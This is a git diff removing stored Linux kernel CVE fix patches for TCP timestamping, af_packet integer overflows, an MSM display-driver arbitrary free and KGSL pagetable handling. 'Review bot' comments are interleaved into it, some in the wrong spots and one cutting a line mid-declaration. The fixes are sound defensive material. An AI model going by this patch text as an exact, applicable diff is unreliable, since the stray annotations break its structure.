return result; -+ if (val > SG_MAX_CDB_SIZE) -+ return -ENOMEM; - sfp->next_cmd_len = (val > 0) ? val : 0; - return 0; - case SG_GET_VERSION_NUM: 
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0003.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7187/3.4/0003.patch.base64
deleted file mode 100644
index fafd941c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-7277/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-7277/^4.10/0001.patch
deleted file mode 100644
index 9d45f459..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7277/^4.10/0001.patch
+++ /dev/null
@@ -1,121 +0,0 @@ -From 4ef1b2869447411ad3ef91ad7d4891a83c1a509a Mon Sep 17 00:00:00 2001 -From: Soheil Hassas Yeganeh -Date: Sat, 18 Mar 2017 17:03:00 -0400 -Subject: tcp: mark skbs with SCM_TIMESTAMPING_OPT_STATS - -SOF_TIMESTAMPING_OPT_STATS can be enabled and disabled -while packets are collected on the error queue. -So, checking SOF_TIMESTAMPING_OPT_STATS in sk->sk_tsflags -is not enough to safely assume that the skb contains -OPT_STATS data. - -Add a bit in sock_exterr_skb to indicate whether the -skb contains opt_stats data. - -Fixes: 1c885808e456 ("tcp: SOF_TIMESTAMPING_OPT_STATS option for SO_TIMESTAMPING") -Reported-by: JongHwan Kim -Signed-off-by: Soheil Hassas Yeganeh -Signed-off-by: Eric Dumazet -Signed-off-by: Willem de Bruijn -Signed-off-by: David S. Miller ---- - include/linux/errqueue.h | 2 ++ - net/core/skbuff.c | 17 +++++++++++------ - net/socket.c | 2 +- - 3 files changed, 14 insertions(+), 7 deletions(-) - -diff --git a/include/linux/errqueue.h b/include/linux/errqueue.h -index 9ca23fc..6fdfc88 100644 ---- a/include/linux/errqueue.h -+++ b/include/linux/errqueue.h -@@ -20,6 +20,8 @@ struct sock_exterr_skb { - struct sock_extended_err ee; - u16 addr_offset; - __be16 port; -+ u8 opt_stats:1, -+ unused:7; - }; - - #endif -diff --git a/net/core/skbuff.c b/net/core/skbuff.c -index b1fbd19..9f78109 100644 ---- a/net/core/skbuff.c -+++ b/net/core/skbuff.c -@@ -3793,16 +3793,20 @@ EXPORT_SYMBOL(skb_clone_sk); - - static void __skb_complete_tx_timestamp(struct sk_buff *skb, - struct sock *sk, -- int tstype) -+ int tstype, -+ bool opt_stats) - { - struct sock_exterr_skb *serr; - int err; - -+ BUILD_BUG_ON(sizeof(struct sock_exterr_skb) > sizeof(skb->cb)); -+ - serr = SKB_EXT_ERR(skb); - memset(serr, 0, sizeof(*serr)); - serr->ee.ee_errno = ENOMSG; - serr->ee.ee_origin = SO_EE_ORIGIN_TIMESTAMPING; - serr->ee.ee_info = tstype; -+ serr->opt_stats = opt_stats; - if (sk->sk_tsflags & SOF_TIMESTAMPING_OPT_ID) { - serr->ee.ee_data = skb_shinfo(skb)->tskey; - if 
(sk->sk_protocol == IPPROTO_TCP && -@@ -3843,7 +3847,7 @@ void skb_complete_tx_timestamp(struct sk_buff *skb, - */ - if (likely(atomic_inc_not_zero(&sk->sk_refcnt))) { - *skb_hwtstamps(skb) = *hwtstamps; -- __skb_complete_tx_timestamp(skb, sk, SCM_TSTAMP_SND); -+ __skb_complete_tx_timestamp(skb, sk, SCM_TSTAMP_SND, false); - sock_put(sk); - } - } -@@ -3854,7 +3858,7 @@ void __skb_tstamp_tx(struct sk_buff *orig_skb, - struct sock *sk, int tstype) - { - struct sk_buff *skb; -- bool tsonly; -+ bool tsonly, opt_stats = false; - - if (!sk) - return; -@@ -3867,9 +3871,10 @@ void __skb_tstamp_tx(struct sk_buff *orig_skb, - #ifdef CONFIG_INET - if ((sk->sk_tsflags & SOF_TIMESTAMPING_OPT_STATS) && - sk->sk_protocol == IPPROTO_TCP && -- sk->sk_type == SOCK_STREAM) -+ sk->sk_type == SOCK_STREAM) { - skb = tcp_get_timestamping_opt_stats(sk); -- else -+ opt_stats = true; -+ } else - #endif - skb = alloc_skb(0, GFP_ATOMIC); - } else { -@@ -3888,7 +3893,7 @@ void __skb_tstamp_tx(struct sk_buff *orig_skb, - else - skb->tstamp = ktime_get_real(); - -- __skb_complete_tx_timestamp(skb, sk, tstype); -+ __skb_complete_tx_timestamp(skb, sk, tstype, opt_stats); - } - EXPORT_SYMBOL_GPL(__skb_tstamp_tx); - -diff --git a/net/socket.c b/net/socket.c -index 692d698..985ef06 100644 ---- a/net/socket.c -+++ b/net/socket.c -@@ -706,7 +706,7 @@ void __sock_recv_timestamp(struct msghdr *msg, struct sock *sk, - SCM_TIMESTAMPING, sizeof(tss), &tss); - - if (skb_is_err_queue(skb) && skb->len && -- (sk->sk_tsflags & SOF_TIMESTAMPING_OPT_STATS)) -+ SKB_EXT_ERR(skb)->opt_stats) - put_cmsg(msg, SOL_SOCKET, SCM_TIMESTAMPING_OPT_STATS, - skb->len, skb->data); - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-7277/^4.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-7277/^4.10/0002.patch deleted file mode 100644 index 85f41260..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7277/^4.10/0002.patch +++ /dev/null 
@@ -1,95 +0,0 @@
-From 8605330aac5a5785630aec8f64378a54891937cc Mon Sep 17 00:00:00 2001
-From: Soheil Hassas Yeganeh
-Date: Sat, 18 Mar 2017 17:02:59 -0400
-Subject: tcp: fix SCM_TIMESTAMPING_OPT_STATS for normal skbs
-
-__sock_recv_timestamp can be called for both normal skbs (for
-receive timestamps) and for skbs on the error queue (for transmit
-timestamps).
-
-Commit 1c885808e456
-(tcp: SOF_TIMESTAMPING_OPT_STATS option for SO_TIMESTAMPING)
-assumes any skb passed to __sock_recv_timestamp are from
-the error queue, containing OPT_STATS in the content of the skb.
-This results in accessing invalid memory or generating junk
-data.
-
-To fix this, set skb->pkt_type to PACKET_OUTGOING for packets
-on the error queue. This is safe because on the receive path
-on local sockets skb->pkt_type is never set to PACKET_OUTGOING.
-With that, copy OPT_STATS from a packet, only if its pkt_type
-is PACKET_OUTGOING.
-
-Fixes: 1c885808e456 ("tcp: SOF_TIMESTAMPING_OPT_STATS option for SO_TIMESTAMPING")
-Reported-by: JongHwan Kim
-Signed-off-by: Soheil Hassas Yeganeh
-Signed-off-by: Eric Dumazet
-Signed-off-by: Willem de Bruijn
-Signed-off-by: David S. Miller
----
- net/core/skbuff.c | 10 ++++++++++
- net/socket.c | 13 ++++++++++++-
- 2 files changed, 22 insertions(+), 1 deletion(-)
-
-diff --git a/net/core/skbuff.c b/net/core/skbuff.c
-index cd4ba8c..b1fbd19 100644
---- a/net/core/skbuff.c
-+++ b/net/core/skbuff.c
-@@ -3694,6 +3694,15 @@ static void sock_rmem_free(struct sk_buff *skb)
- atomic_sub(skb->truesize, &sk->sk_rmem_alloc);
- }
-
-+static void skb_set_err_queue(struct sk_buff *skb)
-+{
-+ /* pkt_type of skbs received on local sockets is never PACKET_OUTGOING.
-+ * So, it is safe to (mis)use it to mark skbs on the error queue.
-+ */
-+ skb->pkt_type = PACKET_OUTGOING;
-+ BUILD_BUG_ON(PACKET_OUTGOING == 0);
-+}
-+
- /*
- * Note: We dont mem charge error packets (no sk_forward_alloc changes)
- */
-@@ -3707,6 +3716,7 @@ int sock_queue_err_skb(struct sock *sk, struct sk_buff *skb)
- skb->sk = sk;
- skb->destructor = sock_rmem_free;
- atomic_add(skb->truesize, &sk->sk_rmem_alloc);
-+ skb_set_err_queue(skb);
-
- /* before exiting rcu section, make sure dst is refcounted */
- skb_dst_force(skb);
-diff --git a/net/socket.c b/net/socket.c
-index e034fe4..692d698 100644
---- a/net/socket.c
-+++ b/net/socket.c
-@@ -652,6 +652,16 @@ int kernel_sendmsg(struct socket *sock, struct msghdr *msg,
- }
- EXPORT_SYMBOL(kernel_sendmsg);
-
-+static bool skb_is_err_queue(const struct sk_buff *skb)
-+{
-+ /* pkt_type of skbs enqueued on the error queue are set to
-+ * PACKET_OUTGOING in skb_set_err_queue(). This is only safe to do
-+ * in recvmsg, since skbs received on a local socket will never
-+ * have a pkt_type of PACKET_OUTGOING.
-+ */
-+ return skb->pkt_type == PACKET_OUTGOING;
-+}
-+
- /*
- * called from sock_recv_timestamp() if sock_flag(sk, SOCK_RCVTSTAMP)
- */
-@@ -695,7 +705,8 @@ void __sock_recv_timestamp(struct msghdr *msg, struct sock *sk,
- put_cmsg(msg, SOL_SOCKET,
- SCM_TIMESTAMPING, sizeof(tss), &tss);
-
-- if (skb->len && (sk->sk_tsflags & SOF_TIMESTAMPING_OPT_STATS))
-+ if (skb_is_err_queue(skb) && skb->len &&
-+ (sk->sk_tsflags & SOF_TIMESTAMPING_OPT_STATS))
- put_cmsg(msg, SOL_SOCKET, SCM_TIMESTAMPING_OPT_STATS,
- skb->len, skb->data);
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7308/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7308/ANY/0001.patch
deleted file mode 100644
index 1992f96b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7308/ANY/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 2b6867c2ce76c596676bec7d2d525af525fdc6e2 Mon Sep 17 00:00:00 2001
-From: Andrey Konovalov
-Date: Wed, 29 Mar 2017 16:11:20 +0200
-Subject: net/packet: fix overflow in check for priv area size
-
-Subtracting tp_sizeof_priv from tp_block_size and casting to int
-to check whether one is less then the other doesn't always work
-(both of them are unsigned ints).
-
-Compare them as is instead.
-
-Also cast tp_sizeof_priv to u64 before using BLK_PLUS_PRIV, as
-it can overflow inside BLK_PLUS_PRIV otherwise.
-
-Signed-off-by: Andrey Konovalov
-Acked-by: Eric Dumazet
-Signed-off-by: David S. Miller
----
- net/packet/af_packet.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
-index a0dbe7c..2323ee3 100644
---- a/net/packet/af_packet.c
-+++ b/net/packet/af_packet.c
-@@ -4193,8 +4193,8 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
- if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
- goto out;
- if (po->tp_version >= TPACKET_V3 &&
-- (int)(req->tp_block_size -
-- BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
-+ req->tp_block_size <=
-+ BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv))
- goto out;
- if (unlikely(req->tp_frame_size < po->tp_hdrlen +
- po->tp_reserve))
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7308/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-7308/ANY/0002.patch
deleted file mode 100644
index d856dfa0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7308/ANY/0002.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 8f8d28e4d6d815a391285e121c3a53a0b6cb9e7b Mon Sep 17 00:00:00 2001
-From: Andrey Konovalov
-Date: Wed, 29 Mar 2017 16:11:21 +0200
-Subject: net/packet: fix overflow in check for tp_frame_nr
-
-When calculating rb->frames_per_block * req->tp_block_nr the result
-can overflow.
-
-Add a check that tp_block_size * tp_block_nr <= UINT_MAX.
-
-Since frames_per_block <= tp_block_size, the expression would
-never overflow.
-
-Signed-off-by: Andrey Konovalov
-Acked-by: Eric Dumazet
-Signed-off-by: David S. Miller
----
- net/packet/af_packet.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
-index 2323ee3..3ac286e 100644
---- a/net/packet/af_packet.c
-+++ b/net/packet/af_packet.c
-@@ -4205,6 +4205,8 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
- rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
- if (unlikely(rb->frames_per_block == 0))
- goto out;
-+ if (unlikely(req->tp_block_size > UINT_MAX / req->tp_block_nr))
-+ goto out;
- if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
- req->tp_frame_nr))
- goto out;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7308/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-7308/ANY/0003.patch
deleted file mode 100644
index 8065045a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7308/ANY/0003.patch
+++ /dev/null
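Review bot: The added guard bounds `tp_block_size * tp_block_nr`, which is stricter than the multiplication it protects: the product evaluated on the next line is `rb->frames_per_block * req->tp_block_nr`. As written it rejects rings whose total size exceeds `UINT_MAX` bytes even when the frame count still fits, so the test could use the real operand, `if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))`. The division also depends on `req->tp_block_nr` being non-zero, which has to be guaranteed by code outside this hunk; packet_set_ring() starts and ends beyond the visible lines.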
@@ -1,32 +0,0 @@
-From bcc5364bdcfe131e6379363f089e7b4108d35b70 Mon Sep 17 00:00:00 2001
-From: Andrey Konovalov
-Date: Wed, 29 Mar 2017 16:11:22 +0200
-Subject: net/packet: fix overflow in check for tp_reserve
-
-When calculating po->tp_hdrlen + po->tp_reserve the result can overflow.
-
-Fix by checking that tp_reserve <= INT_MAX on assign.
-
-Signed-off-by: Andrey Konovalov
-Acked-by: Eric Dumazet
-Signed-off-by: David S. Miller
----
- net/packet/af_packet.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
-index 3ac286e..8489bef 100644
---- a/net/packet/af_packet.c
-+++ b/net/packet/af_packet.c
-@@ -3665,6 +3665,8 @@ packet_setsockopt(struct socket *sock, int level, int optname, char __user *optv
- return -EBUSY;
- if (copy_from_user(&val, optval, sizeof(val)))
- return -EFAULT;
-+ if (val > INT_MAX)
-+ return -EINVAL;
- po->tp_reserve = val;
- return 0;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7364/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7364/ANY/0001.patch
deleted file mode 100644
index be2c9551..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7364/ANY/0001.patch
+++ /dev/null
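Review bot: The new `val > INT_MAX` test can only reject a value if `val` is an unsigned type. Its declaration is outside this hunk, and with a signed `int` the comparison would be always false, so a negative value would still reach `po->tp_reserve`. A short comment would record the intent, e.g. `/* val is unsigned; keeps po->tp_hdrlen + po->tp_reserve from wrapping */`. The bound is also loose: presumably any later code that stores the sum in a narrower type still needs its own range check. packet_setsockopt() begins before the hunk.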
@@ -1,49 +0,0 @@
-From 3ce6c47d2142fcd2c4c1181afe08630aaae5a267 Mon Sep 17 00:00:00 2001
-From: Harsh Sahu
-Date: Thu, 16 Feb 2017 19:52:02 -0800
-Subject: msm : mdss: Avoid arbitrary free of scale_data in error condition
-
-In mdss_fb_copy_destscaler_data function when the code enters error
-section it may free up some arbitrary kernel address. This may
-generate security vulnerability. Hence fixed the loop condition in
-err: to real count of allocated buffer to avoid this arbitrary free.
-
-Change-Id: I4014a3bf9cb0f5da994fa5c0233b7940009be0cd
-Signed-off-by: Harsh Sahu
----
- drivers/video/fbdev/msm/mdss_fb.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/video/fbdev/msm/mdss_fb.c b/drivers/video/fbdev/msm/mdss_fb.c
-index a183fd7..5eab4a5 100644
---- a/drivers/video/fbdev/msm/mdss_fb.c
-+++ b/drivers/video/fbdev/msm/mdss_fb.c
-@@ -4471,7 +4471,7 @@ err:
- static int __mdss_fb_copy_destscaler_data(struct fb_info *info,
- struct mdp_layer_commit *commit)
- {
-- int i;
-+ int i = 0;
- int ret = 0;
- u32 data_size;
- struct mdp_destination_scaler_data __user *ds_data_user;
-@@ -4544,6 +4544,7 @@ static int __mdss_fb_copy_destscaler_data(struct fb_info *info,
- data_size);
- if (ret) {
- pr_err("scale data copy from user failed\n");
-+ kfree(scale_data);
- goto err;
- }
- }
-@@ -4553,7 +4554,7 @@ static int __mdss_fb_copy_destscaler_data(struct fb_info *info,
-
- err:
- if (ds_data) {
-- for (i = 0; i < commit->commit_v1.dest_scaler_cnt; i++) {
-+ for (i--; i >= 0; i--) {
- scale_data = to_user_ptr(ds_data[i].scale);
- kfree(scale_data);
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7366/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7366/ANY/0001.patch
deleted file mode 100644
index 2bf4e77c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7366/ANY/0001.patch
+++ /dev/null
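Review bot: The rewritten cleanup loop `for (i--; i >= 0; i--)` makes `i` the only record of which `ds_data[].scale` slots hold kernel allocations, and nothing in the visible lines states or enforces that invariant. Every `goto err` in the copy loop must leave `i` at the failing index, and every slot below it must already hold a kernel pointer (or NULL) rather than the value copied in from user space. The loop body that stores into `ds_data[i].scale` is outside these hunks, so this has to be checked against the full function. Clearing the slot before each allocation, and again after the added `kfree(scale_data)`, would keep the error path from freeing a user-supplied value or a stale pointer wherever it is entered.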
@@ -1,457 +0,0 @@ -From f4c9ffd6cd7960265f38e285ac43cbecf2459e45 Mon Sep 17 00:00:00 2001 -From: Jordan Crouse -Date: Tue, 31 May 2016 11:24:23 -0600 -Subject: msm: kgsl: Fix pagetable member of struct kgsl_memdesc - -memdesc->pagetable is supposed to help ensure that memory gets -unmapped before it is freed, but the pagetable member is being -populated at create time not when the buffer gets mapped. This -forces the developer to ensure that the same pagetable is -used for both the create and map step. Instead, assign the -pagetable member when it is first used (to get a GPU address) -and put it away when the GPU address is released. - -Change-Id: Ic0dedbad372fd9029b932dd99633a650049751ed -Signed-off-by: Jordan Crouse -Signed-off-by: Sudeep Yedalapure ---- - drivers/gpu/msm/adreno_a5xx.c | 4 ++-- - drivers/gpu/msm/kgsl.c | 33 +++++++-------------------------- - drivers/gpu/msm/kgsl_iommu.c | 35 +++++++++++++++++++---------------- - drivers/gpu/msm/kgsl_mmu.c | 29 +++++++++++++++++++++++------ - drivers/gpu/msm/kgsl_mmu.h | 7 +++---- - drivers/gpu/msm/kgsl_sharedmem.c | 27 ++++++++------------------- - drivers/gpu/msm/kgsl_sharedmem.h | 11 ++++------- - 7 files changed, 66 insertions(+), 80 deletions(-) - -diff --git a/drivers/gpu/msm/adreno_a5xx.c b/drivers/gpu/msm/adreno_a5xx.c -index f770972..bcef03e 100644 ---- a/drivers/gpu/msm/adreno_a5xx.c -+++ b/drivers/gpu/msm/adreno_a5xx.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2014-2017, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -250,7 +250,7 @@ static int a5xx_critical_packet_construct(struct adreno_device *adreno_dev) - return ret; - - ret = kgsl_allocate_user(&adreno_dev->dev, &crit_pkts_refbuf0, -- NULL, PAGE_SIZE, KGSL_MEMFLAGS_SECURE); -+ PAGE_SIZE, KGSL_MEMFLAGS_SECURE); - if (ret) - return ret; - -diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c -index d06eebb..bd022f1 100644 ---- a/drivers/gpu/msm/kgsl.c -+++ b/drivers/gpu/msm/kgsl.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2008-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2008-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -370,24 +370,6 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process, - return kgsl_mmu_get_gpuaddr(pagetable, &entry->memdesc); - } - --/** -- * kgsl_mem_entry_untrack_gpuaddr() - Untrack memory that is previously tracked -- * process - Pointer to process private to which memory belongs -- * entry - Memory entry to untrack -- * -- * Function just does the opposite of kgsl_mem_entry_track_gpuaddr. 
Needs to be -- * called with processes spin lock held -- */ --static void --kgsl_mem_entry_untrack_gpuaddr(struct kgsl_process_private *process, -- struct kgsl_mem_entry *entry) --{ -- struct kgsl_pagetable *pagetable = entry->memdesc.pagetable; -- -- if (entry->memdesc.gpuaddr) -- kgsl_mmu_put_gpuaddr(pagetable, &entry->memdesc); --} -- - /* Commit the entry to the process so it can be accessed by other operations */ - static void kgsl_mem_entry_commit_process(struct kgsl_mem_entry *entry) - { -@@ -436,7 +418,7 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry, - - if (id < 0) { - ret = id; -- kgsl_mem_entry_untrack_gpuaddr(process, entry); -+ kgsl_mmu_put_gpuaddr(&entry->memdesc); - goto err_put_proc_priv; - } - -@@ -472,6 +454,7 @@ err_put_proc_priv: - static void kgsl_mem_entry_detach_process(struct kgsl_mem_entry *entry) - { - unsigned int type; -+ - if (entry == NULL) - return; - -@@ -488,9 +471,7 @@ static void kgsl_mem_entry_detach_process(struct kgsl_mem_entry *entry) - entry->priv->stats[type].cur -= entry->memdesc.size; - spin_unlock(&entry->priv->mem_lock); - -- kgsl_mmu_unmap(entry->memdesc.pagetable, &entry->memdesc); -- -- kgsl_mem_entry_untrack_gpuaddr(entry->priv, entry); -+ kgsl_mmu_put_gpuaddr(&entry->memdesc); - - kgsl_process_private_put(entry->priv); - -@@ -3021,7 +3002,7 @@ static struct kgsl_mem_entry *gpumem_alloc_entry( - entry->memdesc.priv |= KGSL_MEMDESC_SECURE; - - ret = kgsl_allocate_user(dev_priv->device, &entry->memdesc, -- private->pagetable, size, flags); -+ size, flags); - if (ret != 0) - goto err; - -@@ -3442,11 +3423,11 @@ static unsigned long _gpu_set_svm_region(struct kgsl_process_private *private, - return ret; - - entry->memdesc.gpuaddr = (uint64_t) addr; -+ entry->memdesc.pagetable = private->pagetable; - - ret = kgsl_mmu_map(private->pagetable, &entry->memdesc); - if (ret) { -- kgsl_mmu_put_gpuaddr(private->pagetable, -- &entry->memdesc); -+ kgsl_mmu_put_gpuaddr(&entry->memdesc); - return ret; - } - -diff 
--git a/drivers/gpu/msm/kgsl_iommu.c b/drivers/gpu/msm/kgsl_iommu.c -index 0d207494c..724d129 100644 ---- a/drivers/gpu/msm/kgsl_iommu.c -+++ b/drivers/gpu/msm/kgsl_iommu.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2011-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -1402,17 +1402,16 @@ static int _setstate_alloc(struct kgsl_device *device, - { - int ret; - -- ret = kgsl_sharedmem_alloc_contig(device, &iommu->setstate, NULL, -- PAGE_SIZE); -- if (ret) -- return ret; -+ ret = kgsl_sharedmem_alloc_contig(device, &iommu->setstate, PAGE_SIZE); - -- /* Mark the setstate memory as read only */ -- iommu->setstate.flags |= KGSL_MEMFLAGS_GPUREADONLY; -+ if (!ret) { -+ /* Mark the setstate memory as read only */ -+ iommu->setstate.flags |= KGSL_MEMFLAGS_GPUREADONLY; - -- kgsl_sharedmem_set(device, &iommu->setstate, 0, 0, PAGE_SIZE); -+ kgsl_sharedmem_set(device, &iommu->setstate, 0, 0, PAGE_SIZE); -+ } - -- return 0; -+ return ret; - } - - static int kgsl_iommu_init(struct kgsl_mmu *mmu) -@@ -1663,7 +1662,7 @@ static int _iommu_map_guard_page(struct kgsl_pagetable *pt, - - if (!kgsl_secure_guard_page_memdesc.sgt) { - if (kgsl_allocate_user(KGSL_MMU_DEVICE(pt->mmu), -- &kgsl_secure_guard_page_memdesc, pt, -+ &kgsl_secure_guard_page_memdesc, - sgp_size, KGSL_MEMFLAGS_SECURE)) { - KGSL_CORE_ERR( - "Secure guard page alloc failed\n"); -@@ -2264,23 +2263,27 @@ static int kgsl_iommu_get_gpuaddr(struct kgsl_pagetable *pagetable, - } - - ret = _insert_gpuaddr(pagetable, addr, size); -- if (ret == 0) -+ if (ret == 0) { - memdesc->gpuaddr = addr; -+ memdesc->pagetable = pagetable; -+ } - - out: - spin_unlock(&pagetable->lock); - return ret; - } - --static void kgsl_iommu_put_gpuaddr(struct kgsl_pagetable *pagetable, -- struct kgsl_memdesc *memdesc) -+static void 
kgsl_iommu_put_gpuaddr(struct kgsl_memdesc *memdesc) - { -- spin_lock(&pagetable->lock); -+ if (memdesc->pagetable == NULL) -+ return; -+ -+ spin_lock(&memdesc->pagetable->lock); - -- if (_remove_gpuaddr(pagetable, memdesc->gpuaddr)) -+ if (_remove_gpuaddr(memdesc->pagetable, memdesc->gpuaddr)) - BUG(); - -- spin_unlock(&pagetable->lock); -+ spin_unlock(&memdesc->pagetable->lock); - } - - static int kgsl_iommu_svm_range(struct kgsl_pagetable *pagetable, -diff --git a/drivers/gpu/msm/kgsl_mmu.c b/drivers/gpu/msm/kgsl_mmu.c -index d0c5dc7..99dff79 100644 ---- a/drivers/gpu/msm/kgsl_mmu.c -+++ b/drivers/gpu/msm/kgsl_mmu.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2002,2007-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2002,2007-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -419,17 +419,29 @@ EXPORT_SYMBOL(kgsl_mmu_map); - * @pagetable: Pagetable to release the memory from - * @memdesc: Memory descriptor containing the GPU address to free - */ --void kgsl_mmu_put_gpuaddr(struct kgsl_pagetable *pagetable, -- struct kgsl_memdesc *memdesc) -+void kgsl_mmu_put_gpuaddr(struct kgsl_memdesc *memdesc) - { -+ struct kgsl_pagetable *pagetable = memdesc->pagetable; -+ int unmap_fail = 0; -+ - if (memdesc->size == 0 || memdesc->gpuaddr == 0) - return; - -- if (PT_OP_VALID(pagetable, put_gpuaddr)) -- pagetable->pt_ops->put_gpuaddr(pagetable, memdesc); -+ if (!kgsl_memdesc_is_global(memdesc)) -+ unmap_fail = kgsl_mmu_unmap(pagetable, memdesc); -+ -+ /* -+ * Do not free the gpuaddr/size if unmap fails. Because if we -+ * try to map this range in future, the iommu driver will throw -+ * a BUG_ON() because it feels we are overwriting a mapping. 
-+ */ -+ if (PT_OP_VALID(pagetable, put_gpuaddr) && (unmap_fail == 0)) -+ pagetable->pt_ops->put_gpuaddr(memdesc); - - if (!kgsl_memdesc_is_global(memdesc)) - memdesc->gpuaddr = 0; -+ -+ memdesc->pagetable = NULL; - } - EXPORT_SYMBOL(kgsl_mmu_put_gpuaddr); - -@@ -580,7 +592,12 @@ static int nommu_get_gpuaddr(struct kgsl_pagetable *pagetable, - - memdesc->gpuaddr = (uint64_t) sg_phys(memdesc->sgt->sgl); - -- return memdesc->gpuaddr != 0 ? 0 : -ENOMEM; -+ if (memdesc->gpuaddr) { -+ memdesc->pagetable = pagetable; -+ return 0; -+ } -+ -+ return -ENOMEM; - } - - static struct kgsl_mmu_pt_ops nommu_pt_ops = { -diff --git a/drivers/gpu/msm/kgsl_mmu.h b/drivers/gpu/msm/kgsl_mmu.h -index 93b1f9d..d191b1c 100644 ---- a/drivers/gpu/msm/kgsl_mmu.h -+++ b/drivers/gpu/msm/kgsl_mmu.h -@@ -1,4 +1,4 @@ --/* Copyright (c) 2002,2007-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2002,2007-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -92,7 +92,7 @@ struct kgsl_mmu_pt_ops { - u64 (*get_ttbr0)(struct kgsl_pagetable *); - u32 (*get_contextidr)(struct kgsl_pagetable *); - int (*get_gpuaddr)(struct kgsl_pagetable *, struct kgsl_memdesc *); -- void (*put_gpuaddr)(struct kgsl_pagetable *, struct kgsl_memdesc *); -+ void (*put_gpuaddr)(struct kgsl_memdesc *); - uint64_t (*find_svm_region)(struct kgsl_pagetable *, uint64_t, uint64_t, - uint64_t, uint64_t); - int (*set_svm_region)(struct kgsl_pagetable *, uint64_t, uint64_t); -@@ -180,8 +180,7 @@ int kgsl_mmu_map(struct kgsl_pagetable *pagetable, - struct kgsl_memdesc *memdesc); - int kgsl_mmu_unmap(struct kgsl_pagetable *pagetable, - struct kgsl_memdesc *memdesc); --void kgsl_mmu_put_gpuaddr(struct kgsl_pagetable *pagetable, -- struct kgsl_memdesc *memdesc); -+void kgsl_mmu_put_gpuaddr(struct kgsl_memdesc *memdesc); - unsigned int kgsl_virtaddr_to_physaddr(void 
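Review bot: The kernel-doc above `kgsl_mmu_put_gpuaddr()` in the kgsl_mmu.c hunk still lists `@pagetable: Pagetable to release the memory from`, although the new signature takes only `memdesc`; that line should be dropped. The function now reads `memdesc->pagetable` and passes it to `kgsl_mmu_unmap()` without the NULL check that `kgsl_iommu_put_gpuaddr()` gains in the same patch. A descriptor with a GPU address but no pagetable therefore relies on the callee tolerating NULL, which is not visible here. When the unmap fails the range is deliberately kept, but `gpuaddr` and `pagetable` are cleared anyway and nothing is logged, so the leaked range can no longer be traced; a `WARN_ONCE()` or error print in that branch would help diagnosis.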
